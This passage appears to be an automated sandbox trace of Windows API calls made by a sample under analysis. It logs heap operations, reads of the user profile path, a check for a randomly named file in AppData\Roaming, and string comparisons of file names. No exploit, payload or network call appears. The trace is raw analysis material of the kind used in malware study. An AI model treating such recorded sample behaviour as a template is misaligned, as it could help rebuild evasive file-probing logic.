(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0122.702] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb3c8 [0122.703] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/fM4.mkv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\fM4.mkv", lpFilePart=0x8cf650*="fM4.mkv") returned 0x27 [0122.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0122.703] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\fM4.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fm4.mkv")) returned 0xffffffff [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.704] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0122.704] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.704] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GYS46AI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YS46AI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S46AI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46AI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6AI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0122.705] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0122.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0122.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GYS46AI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YS46AI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S46AI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46AI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6AI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.706] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0122.706] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0122.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0122.707] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0122.707] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0122.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0122.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0122.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0122.709] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0122.709] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0122.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0122.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0122.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 